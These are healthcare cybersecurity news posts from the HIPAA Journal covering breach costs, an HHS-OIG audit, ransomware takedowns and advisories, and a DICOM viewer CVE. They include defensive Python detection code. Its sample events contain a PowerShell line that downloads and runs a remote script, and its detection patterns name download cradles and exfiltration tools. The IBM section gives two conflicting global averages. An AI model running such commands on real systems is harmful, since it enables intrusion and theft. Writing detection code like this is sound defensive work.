Healthcare Cybersecurity

Average Cost of a Healthcare Data Breach Falls to $7.42 Million

IBM has published the 2025 Cost of a Data Breach Report, which shows a fall in the global average cost of a data breach, but an increase in the cost of U.S. data breaches, which have set a new record at $10.22 million, increasing by 9.2% from an average of $9.36 million in 2024. The higher data breach costs in the United States were largely due to higher regulatory fines and detection and escalation costs. Globally, data breach costs have fallen for the first time in five years to an average of $4.44 million.

Figure: Global average cost of a data breach in 2025 (in millions). Source: IBM

IBM has been releasing data breach cost reports for the past 20 years. This year, the study was conducted on 600 organizations of various sizes from 16 countries and geographic regions. Out of the 600 organizations participating in the study, 16% were located in the United States and Canada. The report is based on an analysis of data from organizations in 17 industries, 2% of which are in the healthcare industry.

There has been a fall in the cost of healthcare data breaches in the United States, which dropped by $2.35 million year-over-year to an average of $7.42 million. While the cost of a healthcare data breach has fallen significantly, healthcare data breaches are still the costliest out of all industries studied by IBM, and have been for the past 14 years.

Globally, the time to identify and contain a data breach fell to a 9-year low of 241 days, reducing by 17 days compared to 2024. IBM explains that the reduction in average containment time was largely due to a higher number of organizations detecting the data breach internally rather than being notified by an attacker. Healthcare data breaches took the longest to identify and contain, at an average of 279 days, five weeks longer than the global average breach lifecycle.

Phishing was the leading initial access vector in 2025, accounting for almost 16% of data breaches. Stolen credentials (10%), last year’s leading vector, fell to third place behind supply chain compromise (15%). Ransomware continues to be a problem for healthcare organizations; however, more organizations are choosing not to pay. Last year, 59% of organizations that experienced a ransomware attack refused to pay the ransom, rising to 63% this year. With fewer organizations paying, ransom demands have remained high, averaging $5.08 million in attacker-disclosed attacks. Fewer ransomware victims are involving law enforcement, even though law enforcement involvement shaved an average of $1 million off data breach costs last year: 52% of ransomware victims contacted law enforcement in 2024, compared to 40% in 2025.

Data breaches invariably result in operational disruption, with almost all breached organizations reporting at least some disruption to operations as a result of a breach. The majority of breached organizations took more than 100 days to recover from a data breach. While breached organizations often absorb the cost of a data breach, this year, almost half of the organizations that suffered a data breach said they would be raising the price of goods and services as a result, with almost one-third planning to increase costs by 15% or more due to a data breach.

Each year, the cost of a data breach report identifies the main factors that increase or decrease breach costs. The biggest components in breach costs were detection and escalation ($1.47 million), lost business ($1.38 million), and post-breach response ($1.2 million), although IBM notes that detection and escalation costs fell by almost 10% compared to last year, and lost business and post-breach response costs also fell.

Based on a global average cost of $4.88 million, the factors that reduced data breach costs the most were adopting a DevSecOps approach (-$227K), AI-driven and ML-driven insights (-$223K), security analytics or SIEM (-$212K), threat intelligence (-$211K), and data encryption (-$208K). The main factors that increased breach costs were supply chain breaches (+$227K), security systems complexity (+$207K), shadow IT (+$200K), and AI tool adoption (+$193.5K).

Shadow IT – unauthorized use of software and devices – was a new addition to this year’s top three factors increasing data breach costs. Shadow IT increases the attack surface and creates a security blind spot, and IBM warns that many organizations are failing to look for shadow IT, so it remains undetected and can provide an easily exploitable backdoor into networks. On average, organizations with a high level of shadow IT experienced data breach costs $670K higher than organizations with a low level of shadow IT.

For this year’s report, IBM looked at the adoption of AI and found that AI adoption is outpacing governance. The majority of organizations that have adopted AI solutions said they did not have AI governance policies to mitigate or manage the risk of AI. Organizations lacking AI governance paid higher costs when breached. IBM has determined that AI models and applications are an emerging attack surface, especially in the case of shadow AI. This year, 13% of organizations reported a security incident involving an AI model or application that resulted in a data breach, and an overwhelming majority of those breached organizations – 97% – said they lacked proper AI access controls.

There has been growing concern about the use of generative AI by threat actors, such as for accelerating malware development and creating text and images for phishing and social engineering campaigns. IBM looked at the prevalence of AI-driven attacks and found that 16% of breaches involved the use of AI by attackers, with the majority of those attacks involving phishing (37%) or deepfakes (35%).

In last year’s report, almost two-thirds of organizations said they would be increasing investment in cybersecurity over the following 12 months; this year, only 49% plan to increase investment in the next 12 months. Fewer than half of the organizations planning to increase security investment said they were focusing on AI-driven solutions or services.

The post Average Cost of a Healthcare Data Breach Falls to $7.42 Million appeared first on The HIPAA Journal.

HHS-OIG Audit Finds Security Gaps at Large Northeastern Hospital

An audit of a large northeastern hospital by the Department of Health and Human Services Office of Inspector General (HHS-OIG) has identified cybersecurity gaps and weaknesses that are likely to be present in similarly sized hospitals across the country.

Cyberattacks on healthcare organizations have increased sharply in recent years. Between 2018 and 2022, there was a 93% increase in large data breaches reported to the HHS’ Office for Civil Rights (OCR) and a 278% increase in large data breaches involving ransomware. In 2022 alone, OCR received 64,592 reports of healthcare data breaches, across which the protected health information of 42 million individuals may have been exposed or stolen.

The HHS plays an important role in guiding and supporting the adoption of cybersecurity measures to protect patients and healthcare delivery from cyberattacks. The large number of successful cyberattacks raises questions about whether the HHS, including the Centers for Medicare and Medicaid Services (CMS) and OCR, could do more with its cybersecurity guidance, oversight, and outreach to help healthcare organizations implement robust cybersecurity controls and better protect their networks from attack.

While OCR usually conducts audits of HIPAA-regulated entities to assess cybersecurity and compliance with the HIPAA Rules, HHS-OIG’s 2025 Work Plan includes a series of 10 audits of U.S. hospitals to gain insights into healthcare cybersecurity and assess the cybersecurity measures that have been put in place. A northeastern hospital with more than 300 beds agreed to an audit to assess whether appropriate cybersecurity controls had been implemented for preventing and detecting cyberattacks, whether protocols had been developed for ensuring the continuity of care during a cyberattack, and the controls in place to protect Medicare enrollee data. The audited entity was not named due to the threat of cyberattacks.

The hospital is part of a network of providers that share protected health information for treatment, payment, and healthcare operations, and is a covered entity under HIPAA, required to implement safeguards to ensure the confidentiality, integrity, and availability of protected health information. As a provider of healthcare services under the Medicare program, the hospital is also required to comply with the CMS Conditions of Participation (CoPs). The hospital had implemented measures to comply with the CoPs and HIPAA, and had voluntarily adopted the NIST Cybersecurity Framework to reduce and better manage cybersecurity risks.

The hospital was found to have implemented data security measures to protect Medicare data and had effective cybersecurity controls to ensure continuity of care in the event of a cyberattack, including appropriate network architecture, backup strategies, incident response plans, and disaster recovery controls. HHS-OIG did, however, identify several cybersecurity weaknesses and security gaps.

HHS-OIG conducted several simulated cyberattacks on Internet-facing systems and found its cybersecurity controls, which included a web application firewall (WAF), were generally effective at blocking or limiting malicious requests. Simulated phishing emails were also sent to employees, and no employee responded or interacted with the fake website HHS-OIG had set up for the phishing scam.

HHS-OIG analyzed 26 internet-accessible systems and discovered two had weaknesses in their cybersecurity controls that could potentially be exploited by threat actors to gain access to systems. HHS-OIG also identified 13 web applications with weaknesses in configuration management controls, and 16 internet-accessible systems with weaknesses in identification and authentication controls that left them susceptible to interaction and manipulation by threat actors.

HHS-OIG explained that the weaknesses occurred because two systems had been integrated into the hospital’s existing IT environment without following security best practices. Further, while there were procedures for periodically assessing web application security controls, they were not effective at identifying weaknesses before they could be exploited, and industry web application security best practices had not been effectively implemented.

While the systems that were susceptible to some of the HHS-OIG’s simulated attacks did not contain patient data, compromising those systems could potentially provide attackers with a launch pad for conducting additional attacks against other systems, including systems that contained patient data. A threat actor could also use information gathered in an attack on a vulnerable system to conduct more convincing social engineering campaigns on the workforce.

The hospital concurred with all five HHS-OIG recommendations:

  • Enforce and periodically assess compliance with its configuration and change management policy.
  • Periodically assess and update its identification and authentication controls.
  • Periodically assess and update its configuration management controls.
  • Establish a policy or process to periodically assess its internet-accessible systems and application security controls for vulnerabilities.
  • Ensure developers follow secure coding practices.

The post HHS-OIG Audit Finds Security Gaps at Large Northeastern Hospital appeared first on The HIPAA Journal.

Feds Confirm Seizure of BlackSuit Ransomware Infrastructure

Homeland Security Investigations (HSI), the investigative arm of the Department of Homeland Security (DHS) and part of U.S. Immigration and Customs Enforcement (ICE), has released further information about last month’s seizure of dark web domains used by the BlackSuit ransomware group.

On July 24, 2025, the U.S. Department of Justice (DoJ) confirmed that an international law enforcement operation codenamed Operation Checkmate resulted in the seizure of domains used by the BlackSuit ransomware group. Banners were added to those sites confirming they were under the control of law enforcement. The sites were used by the BlackSuit ransomware group to leak data stolen and to communicate with victims to negotiate ransom payments.

HSI confirmed in an August 7, 2025, announcement that BlackSuit was the successor to Royal ransomware. Both groups have terrorized critical infrastructure entities around the world since Royal emerged in 2022. Royal was the successor to Quantum ransomware, which is thought to be one of the groups operated by former members of the disbanded Conti ransomware operation.

Since 2022, Royal and BlackSuit have conducted more than 450 successful ransomware attacks on companies in the United States, including many critical infrastructure entities in healthcare, education, public safety, energy, and government. The ransomware groups engaged in double extortion, stealing data and encrypting files, then demanding payment both to prevent the data from being leaked and to obtain the decryption keys. Victims have paid Royal and BlackSuit more than $370 million in ransom payments, based on current cryptocurrency values.

The operation involved the HSI Cyber Crimes Center, IRS Criminal Investigation’s Cyber Crimes Unit, the U.S. Secret Service, the FBI, Europol, and multiple international law enforcement partners, and resulted in the seizure of the group’s servers, domains, and digital assets used to support the group’s attacks, data theft, extortion, and money laundering.

“Disrupting ransomware infrastructure is not only about taking down servers — it’s about dismantling the entire ecosystem that enables cybercriminals to operate with impunity,” said HSI Cyber Crimes Center Deputy Assistant Director Michael Prado. “This operation is the result of tireless international coordination and shows our collective resolve to hold ransomware actors accountable.”

A DoJ announcement on August 11, 2025, explained that laundered cryptocurrency valued at $1,091,453 had been seized as part of the operation, along with four servers and nine domains. The DoJ explained that one of the victims of the Royal ransomware group paid a 49.3120227 Bitcoin ransom to decrypt their data, which was valued at $1,445,454.86 at the time of the transaction. Some of the proceeds, $1,091,453, were repeatedly deposited and withdrawn in a virtual currency exchange to hide the source of the funds. The funds were frozen by the exchange on or around January 9, 2024, and were obtained by U.S. authorities after issuing a warrant for seizure.

“The BlackSuit ransomware gang’s persistent targeting of U.S. critical infrastructure represents a serious threat to U.S. public safety,” said Assistant Attorney General for National Security John A. Eisenberg. “The National Security Division is proud to be part of an ongoing team of government agencies and partners working to protect our Nation from threats to our critical infrastructure.”

July 25, 2025: BlackSuit Ransomware Dark Web Sites Seized by Law Enforcement

The dark web sites of the BlackSuit ransomware group have been seized as part of an international law enforcement operation. The takedown includes BlackSuit’s negotiation and data leak sites, following a court order that authorized the seizure.

The dark web sites have been replaced with banners advising visitors about the seizure by U.S. Homeland Security Investigations as part of Operation Checkmate. Several law enforcement partners assisted with the operation, including the U.S. Department of Justice, the Federal Bureau of Investigation (FBI), the U.S. Office of Foreign Assets Control (OFAC), Europol, the UK National Crime Agency, and law enforcement agencies in Canada, Germany, Ukraine, Lithuania, Ireland, and France. The Romanian cybersecurity firm Bitdefender also assisted during the operation. At the time of writing, the authorities had yet to make an announcement about the operation and any other achievements.

BlackSuit ransomware first appeared in June 2023, having rebranded following an attack on the City of Dallas in Texas. The group previously operated under the name Royal from September 2022 to June 2023. Prior to that, Royal operated under the name Quantum and is believed to have been started by members of the Conti ransomware group. Operating as BlackSuit, the group is thought to have claimed more than 180 victims worldwide and more than 350 victims under the name Royal.

While the takedown is good news, researchers have suggested that BlackSuit may have already rebranded or that some former members of BlackSuit have formed a new group, Chaos ransomware. Researchers at Cisco Talos explained in a June 24, 2025, blog post that they have assessed with moderate confidence that the new group was formed by members of the BlackSuit ransomware group due to similarities in the encryption methodology, ransom note, and toolset used in attacks. Chaos has already conducted at least ten attacks, mostly in the United States. The new group does not appear to be targeting any specific industries.

“The disruption of BlackSuit’s infrastructure marks another important milestone in the fight against organized cybercrime,” stated a representative of the Draco Team, Bitdefender’s cybercrime unit, who participated in the takedown. “We commend our law enforcement partners for their coordination and determination. Operations like this reinforce the critical role of public-private partnerships in tracking, exposing, and ultimately dismantling ransomware groups that operate in the shadows. When global expertise is aligned, cybercriminals have fewer places to hide.”

On July 28, 2025, FBI Dallas announced the seizure of 20 Bitcoins (now valued at $2.3 million) from a cryptocurrency address belonging to a member of the Chaos ransomware group. The funds were tracked to a Bitcoin wallet used by an affiliate with the moniker “Hors” who is suspected of conducting attacks and extorting payments from companies in the Northern District of Texas and elsewhere. The U.S. Department of Justice filed a civil complaint in the Northern District of Texas on July 24, 2025, seeking the forfeiture of the funds, which were seized by the FBI in Dallas in mid-April.

The post Feds Confirm Seizure of BlackSuit Ransomware Infrastructure appeared first on The HIPAA Journal.

Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint alert about the Interlock ransomware group, which has accelerated attacks on businesses and critical infrastructure organizations. The alert shares the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IoCs) collected from investigations of the group’s ransomware attacks in June 2025.

Interlock is a ransomware-as-a-service operation that first emerged in September 2024. The group has attacked entities in multiple sectors but appears to favor organizations in the healthcare and public health (HPH) sector. Healthcare victims include the kidney dialysis giant DaVita, Texas Tech University Health Sciences Center, Kettering Health, Drug and Alcohol Treatment Services, Brockton Neighborhood Health Center, and Naper Grove Vision Care.

Interlock is a financially motivated cybercriminal group that uses ransomware in its attacks on Windows and Linux systems, favoring attacks in North America and Europe. The group engages in double extortion tactics, breaching networks, stealing data, and demanding payment to decrypt files and prevent the publication of the stolen data on its dark web data leak site. The group’s TTPs are constantly evolving, and several new techniques have been observed in recent weeks.

One relatively unusual technique for a ransomware group is the use of compromised legitimate websites for drive-by downloads, with the payload disguised as an installer for Google Chrome, Microsoft Edge, or other popular software. These attacks deliver a remote access trojan (RAT), which provides initial access. The RAT executes a PowerShell script that establishes persistence by dropping a file into the Windows Startup folder so that it runs each time the user logs in; alternatively, a PowerShell command creates a Run key value in the Windows Registry for persistence.

The group has also been observed using the ClickFix social engineering technique for initial access. This involves tricking individuals into executing a malicious payload by convincing them that doing so will fix a problem on their device – blocking spam emails, removing a fictitious malware infection, etc.

Once initial access has been gained, tools such as Interlock RAT and NodeSnake RAT are used for C2 communications and command execution. The group has been observed using PowerShell to download a credential stealer and keylogger to harvest credentials for lateral movement and privilege escalation. Azure Storage Explorer is used to access Azure storage accounts, AzCopy is used to upload data to the Azure storage blob, and file transfer tools such as WinSCP have also been used for data exfiltration.
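The persistence and exfiltration behaviours described in the two paragraphs above are all visible in ordinary endpoint telemetry. The following Python sketch is an added illustration written for this page, not code from the joint advisory, CISA, or any vendor: it runs simple detections for Startup-folder drops, Run-key writes, PowerShell download cradles, and the AzCopy/Storage Explorer/WinSCP tooling named in the alert over a handful of constructed Sysmon-style events. Field names follow Sysmon’s process-create (Event ID 1), file-create (ID 11), and registry-value-set (ID 13) events; every path, SID, address, and hostname in the sample is fabricated, and the executable name assumed for Azure Storage Explorer is an assumption rather than something the advisory states.

```python
"""Toy detector for Interlock-style persistence and exfiltration behaviour.

Added example for this page; not the advisory's or any agency's code. The
event records below are constructed to resemble Sysmon fields, not real logs.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Autostart locations the advisory describes: Run keys and the per-user Startup folder.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)

# Download cradles and hidden/encoded invocations typical of a PowerShell stager.
PS_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)

# Tools the advisory names for staging data to Azure blobs or moving it over SFTP.
# "storageexplorer.exe" is an assumed binary name for Azure Storage Explorer.
EXFIL_TOOLS = {"azcopy.exe", "winscp.exe", "storageexplorer.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon records full image paths)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Dict) -> List[str]:
    """Return the names of every rule the single event trips (possibly none)."""
    hits: List[str] = []
    eid = ev.get("EventID")
    if eid == 1:  # process creation
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if image in EXFIL_TOOLS:
            hits.append(f"exfil-tool: {image}")
        if image in ("powershell.exe", "pwsh.exe") and PS_CRADLE_RE.search(cmd):
            hits.append("powershell-download-cradle")
    elif eid == 11:  # file creation
        if STARTUP_DIR_RE.search(ev.get("TargetFilename", "")):
            hits.append("startup-folder-persistence")
    elif eid == 13:  # registry value set
        if RUN_KEY_RE.search(ev.get("TargetObject", "")):
            hits.append("run-key-persistence")
    return hits


def scan(events: Iterable[Dict]) -> List[Tuple[str, str]]:
    """Run every event through classify(); return (rule, originating image) pairs in order."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        for rule in classify(ev):
            findings.append((rule, ev.get("Image", "?")))
    return findings


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (fabricated paths, SID, IP and hostname).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a.ps1')\""},
    {"EventID": 11, "Image": PS_IMAGE,
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk"},
    {"EventID": 13, "Image": PS_IMAGE,
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\jdoe\AppData\Roaming\updater.exe"},
    {"EventID": 1, "Image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "CommandLine": "azcopy.exe copy C:\\Finance https://storage.example.invalid/c?sv=2023 --recursive"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},  # benign: should not match
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},  # benign
]


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:32s} <- {image}")
```

In production the events would come from Sysmon or an EDR rather than a list, and the Run-key and Startup-folder rules need an allowlist for legitimate installers, which write to the same locations; the value of the rules is the combination of a hidden PowerShell cradle, an autostart write, and a bulk-copy tool from the same user session within a short window.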

The authoring agencies have made several recommendations to mitigate Interlock threat activity, which include the following:

  • Implement domain name system (DNS) filtering to block access to malicious websites
  • Implement a web access firewall
  • Patch promptly and keep all software and operating systems up to date
  • Train end users to spot social engineering and phishing attempts
  • Segment networks to restrict lateral movement
  • Implement robust identity, credential, and access policies
  • Implement multifactor authentication on all accounts and services as far as possible, ideally phishing-resistant multi-factor authentication.
  • Ensure backups are made of the entire organization’s data infrastructure, and that backup data is encrypted, immutable, and stored securely off-site


The post Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike appeared first on The HIPAA Journal.

Bipartisan Healthcare Cybersecurity Act Introduced in House and Senate

Last week, a pair of bipartisan bills were introduced in the House of Representatives and Senate that seek to enhance the cybersecurity of the healthcare and public health (HPH) sector by improving coordination at the federal level to ensure that government agencies can respond quickly and efficiently to cyberattacks on HPH sector entities.

Healthcare cyberattacks have increased significantly in recent years, with more than 700 data breaches affecting 500 or more individuals reported to the HHS’ Office for Civil Rights in each of the past four years. In the past couple of years, a huge volume of healthcare records has been breached. In 2023, the protected health information of more than 172 million individuals was exposed or impermissibly disclosed in healthcare data breaches, and 278 million individuals were affected by healthcare data breaches in 2024.

In 2024, a ransomware group breached the systems of Change Healthcare, stole the records of an estimated 190 million individuals, and used ransomware to encrypt files. The prolonged outage of Change Healthcare’s systems caused massive disruption to the revenue cycles of healthcare providers across the country and considerable disruption to patient care, and the stolen data was leaked on the dark web.

The Healthcare Cybersecurity Act of 2025 was introduced by Congressman Jason Crow (D-CO), who was joined in introducing the legislation by Congressman Brian Fitzpatrick (R-PA). A companion bill was introduced in the Senate by Senators Jacky Rosen (D-NV) and Todd Young (R-IN). Congressman Crow previously introduced the Healthcare Cybersecurity Act in the 117th and 118th Congresses. “As technology advances, we must do more to protect Americans’ sensitive data,” said Congressman Crow. “That’s why I’m leading bipartisan legislation to strengthen our defenses and protect families from cyberattackers.”

If passed, the Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Department of Health and Human Services (HHS) would be required to collaborate on improving HPH sector cybersecurity. A liaison would be created between the two agencies to coordinate the responses to cyberattacks, and the act would authorize cybersecurity training for all relevant personnel. The bill also requires CISA and the HHS to conduct a study to identify the specific risks faced by the HPH sector.

“Cyberattacks on our healthcare system endanger more than data—they put lives at risk. I’ve long worked to strengthen our nation’s cyber defenses where Americans are most exposed, from small businesses to hospitals. This bipartisan bill takes direct, strategic action: empowering CISA and HHS to coordinate real-time threat sharing, expanding cybersecurity training for providers, and establishing a dedicated liaison to bolster response. We’re not just responding to attacks—we’re building the infrastructure to prevent them, protect patient privacy, and defend a vital pillar of our national security,” said Congressman Fitzpatrick.

The post Bipartisan Healthcare Cybersecurity Act Introduced in House and Senate appeared first on The HIPAA Journal.

High Severity Vulnerability Identified in MicroDicom DICOM Viewer

A high-severity vulnerability has been identified in the MicroDicom DICOM Viewer, a popular free-to-use software for viewing and manipulating DICOM medical images.

The vulnerability can be exploited remotely in a low complexity attack, and successful exploitation can allow the execution of arbitrary code on vulnerable installations of DICOM Viewer; however, user interaction is required to exploit the vulnerability. A threat actor would need to convince a user to open a malicious DICOM file locally or visit a specially crafted malicious web page, for example, through social engineering or phishing.

The vulnerability affects DICOM Viewer version 2025.2 (Build 8154) and prior versions and is tracked as CVE-2025-5943. It is an out-of-bounds write issue: a crafted file can cause the viewer to write to memory outside the bounds of the intended buffer, which can lead to arbitrary code execution. The vulnerability has been assigned a CVSS v4 base score of 8.6 out of 10 and a CVSS v3.1 base score of 8.8 out of 10. While there were no known cases of the vulnerability being exploited in the wild at the time of disclosure, prompt patching is recommended. The vulnerability has been fixed in version 2025.3 and later versions.
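To make the bug class concrete, here is an added Python walker for the explicit-VR little-endian data elements that make up a DICOM file, with the length check that stops a parser from reading or writing past the end of its buffer. It is an illustration written for this page, not MicroDicom’s code, and nothing here describes how CVE-2025-5943 is actually triggered; the two files it builds are constructed samples, not trigger files. The header layout and the set of VRs that carry a 4-byte length follow DICOM PS3.5; the UI, PN, and OW elements used as sample content are assumed test data.

```python
"""Bounds-checked walker for DICOM explicit-VR little-endian data elements.

Added example for this page; not MicroDicom's code. The sample files below are
constructed and are not related to any real exploit for CVE-2025-5943.
"""
import struct
from typing import Iterator, Tuple

# VRs whose header carries 2 reserved bytes plus a 4-byte length (DICOM PS3.5 7.1.2).
LONG_VRS = {b"OB", b"OD", b"OF", b"OL", b"OV", b"OW", b"SQ", b"SV",
            b"UC", b"UN", b"UR", b"UT", b"UV"}
UNDEFINED_LENGTH = 0xFFFFFFFF


class DicomParseError(ValueError):
    """Raised when a header or declared length does not fit the bytes present."""


def parse_elements(buf: bytes) -> Iterator[Tuple[Tuple[int, int], str, bytes]]:
    """Yield ((group, element), VR, value) for each top-level element.

    Every declared length is compared with the bytes actually remaining
    before the value is touched. A native viewer that skips this comparison
    and copies `length` bytes into a fixed buffer is the out-of-bounds
    write pattern the advisory describes.
    """
    if len(buf) < 132 or buf[128:132] != b"DICM":
        raise DicomParseError("missing 128-byte preamble or DICM magic")
    pos, end = 132, len(buf)
    while pos < end:
        if end - pos < 8:
            raise DicomParseError(f"truncated element header at offset {pos}")
        group, elem = struct.unpack_from("<HH", buf, pos)
        vr = buf[pos + 4:pos + 6]
        if not (vr.isalpha() and vr.isupper()):
            raise DicomParseError(f"invalid VR {vr!r} at offset {pos + 4}")
        if vr in LONG_VRS:
            if end - pos < 12:
                raise DicomParseError(f"truncated long-VR header at offset {pos}")
            (length,) = struct.unpack_from("<I", buf, pos + 8)
            pos += 12
        else:
            (length,) = struct.unpack_from("<H", buf, pos + 6)
            pos += 8
        if length == UNDEFINED_LENGTH:
            raise DicomParseError(
                f"undefined-length element ({group:04X},{elem:04X}) not handled here")
        if length > end - pos:  # the check that an unsafe parser omits
            raise DicomParseError(
                f"element ({group:04X},{elem:04X}) declares {length} bytes "
                f"but only {end - pos} remain")
        yield (group, elem), vr.decode("ascii"), buf[pos:pos + length]
        pos += length


def encode_element(group: int, elem: int, vr: bytes, value: bytes,
                   declared_length: int = None) -> bytes:
    """Encode one element; declared_length lets a test lie about the value size."""
    length = len(value) if declared_length is None else declared_length
    header = struct.pack("<HH", group, elem) + vr
    if vr in LONG_VRS:
        header += b"\x00\x00" + struct.pack("<I", length)
    else:
        header += struct.pack("<H", length)
    return header + value


def build_file(*elements: bytes) -> bytes:
    """Preamble + magic + elements, the Part 10 file layout."""
    return b"\x00" * 128 + b"DICM" + b"".join(elements)


# Constructed samples (assumed test content, not real study data).
TRANSFER_SYNTAX = b"1.2.840.10008.1.2.1\x00"  # explicit VR LE, null-padded to even length
GOOD_FILE = build_file(
    encode_element(0x0002, 0x0010, b"UI", TRANSFER_SYNTAX),
    encode_element(0x0010, 0x0010, b"PN", b"Doe^Jane"),
    encode_element(0x7FE0, 0x0010, b"OW", b"\x00\x01\x02\x03"),
)
# Pixel-data element claims ~2 GiB while the file ends after 4 bytes.
BAD_FILE = build_file(
    encode_element(0x0002, 0x0010, b"UI", TRANSFER_SYNTAX),
    encode_element(0x7FE0, 0x0010, b"OW", b"\x00\x01\x02\x03", declared_length=0x7FFFFFF0),
)


def check_file(buf: bytes) -> str:
    """Triage helper: 'ok: N elements' or 'rejected: <reason>'."""
    try:
        count = sum(1 for _ in parse_elements(buf))
    except DicomParseError as exc:
        return f"rejected: {exc}"
    return f"ok: {count} elements"


if __name__ == "__main__":
    print(check_file(GOOD_FILE))
    print(check_file(BAD_FILE))
```

The walker deliberately refuses undefined-length elements and nested sequences rather than guessing, which is the right default for a pre-screening step in front of a viewer; a full reader has to track sequence and item delimiters, and each of those is another length field that must be checked the same way.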

The vulnerability was identified by independent security researcher Michael Heinzl, who reported it to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The latest announcement follows a May 2025 disclosure of two high-severity vulnerabilities, a February 2025 disclosure of a medium-severity vulnerability that can be exploited in a machine-in-the-middle (MitM) attack, and four high-severity vulnerabilities identified in 2024 and disclosed in March and June of last year.

Since vulnerabilities are frequently discovered, it is advisable to locate DICOM Viewer behind a firewall, to isolate it from business networks, and if remote access is required, to use a secure method of connection such as a Virtual Private Network (VPN) and ensure that the VPN is kept up to date.

The post High Severity Vulnerability Identified in MicroDicom DICOM Viewer appeared first on The HIPAA Journal.

Healthcare Organizations Take 3.7 Months To Announce Ransomware Data Breaches

A recent data analysis by Comparitech has revealed that the average time for a U.S. healthcare organization to report a ransomware attack is 3.7 months, the shortest time out of all industries represented in the study. Across all industries, the average time to report a ransomware attack in 2023 was 5.1 months, a considerable increase from the average of 2.1 months in 2018.

In 2024, ransomware-related data breaches took an average of 3.7 months to report, although it is too early to obtain reliable reporting data, as ransomware victims are still reporting ransomware-related data breaches from last year.

Comparitech’s researchers analyzed data from 2,600 U.S. ransomware attacks since 2018. Over the entire period of study, the average time to report a data breach following a ransomware attack was 4.1 months. The legal sector delayed reporting data breaches for the longest time, taking an average of 6.4 months to report the data breach.

While healthcare had the shortest breach reporting times, one healthcare entity had an exceptionally long delay between the date of the attack and the issuing of notifications. Ventura Orthopedics experienced a ransomware attack in July 2020, yet notification letters were not sent until September 2023, 38 months later. Another healthcare entity, Westend Dental, took two years from the date of the attack to issue notification letters, earning the company a $350,000 financial penalty.

Reporting times are no doubt influenced by federal and state laws. In healthcare, the Breach Notification Rule of the Health Insurance Portability and Accountability Act (HIPAA) requires regulated entities to report a data breach without unreasonable delay and no later than 60 days after discovery. If the total number of affected individuals is not yet known, the regulated entity must report the breach using an estimated total, with the estimated figure typically being 500 or 501; 500 affected individuals is the threshold for media announcements and public listing of the data breach on the HHS’ Office for Civil Rights breach portal.

Looking at the business sector only, healthcare again had one of the shortest delays, taking an average of 3.4 months to report a data breach, second only to utilities at 3.3 months. Healthcare businesses in this sector were not direct healthcare providers.

Comparitech also identified shorter breach reporting times in states that have implemented data breach notification laws, with an average time of 3.9 months to report a breach in those states compared to 4.2 months in other states. The states with the longest breach reporting times were Wyoming (7.3 months), the District of Columbia (6.6 months), and North Dakota (6.3 months), whereas the states with the shortest reporting periods were Montana (1.9 months), South Dakota (2.2 months), and Alaska (2.3 months).

While it may not be possible to issue notification letters quickly, it is important to announce ransomware attacks to allow potentially affected individuals to take steps to protect themselves. If it takes 4.1 months on average to report a ransomware-related data breach, that gives ample time for stolen data to be misused.

Ransomware groups that engage in double extortion list the stolen data on their data leak sites if the ransom is not paid, and the data can be downloaded by anyone. That means the data could be misused for several months before the affected individuals are notified. If a notice is added to the breached organization’s website, even if data theft has not been confirmed, consumers would be aware that they could potentially be at risk and could take steps to protect themselves.

The post Healthcare Organizations Take 3.7 Months To Announce Ransomware Data Breaches appeared first on The HIPAA Journal.

Microsoft, Fortinet & Ivanti Warn About Actively Exploited Zero Day Vulnerabilities

Microsoft, Fortinet & Ivanti have all notified customers about vulnerabilities in their products that are known to have been exploited by threat actors. Prompt patching is strongly recommended, and the vendors' workarounds or mitigations should be implemented if patching must be delayed.

Microsoft

On Patch Tuesday, Microsoft issued patches for five vulnerabilities known to have been exploited in the wild, plus two publicly disclosed zero-day vulnerabilities. The actively exploited vulnerabilities are:

| Product | CVE | Severity | Type | Outcome |
|---|---|---|---|---|
| Microsoft DWM Core Library | CVE-2025-30400 | Important | Elevation of Privilege | Local elevation of privilege to SYSTEM |
| Windows Common Log File System | CVE-2025-32701 | Important | Elevation of Privilege | Local elevation of privilege to SYSTEM |
| Windows Common Log File System | CVE-2025-32706 | Important | Elevation of Privilege | Local elevation of privilege to SYSTEM |
| Windows Ancillary Function Driver | CVE-2025-32709 | Important | Elevation of Privilege | Local elevation of privilege to SYSTEM |
| Microsoft Scripting Engine | CVE-2025-30397 | Important | Memory Corruption | Code execution |

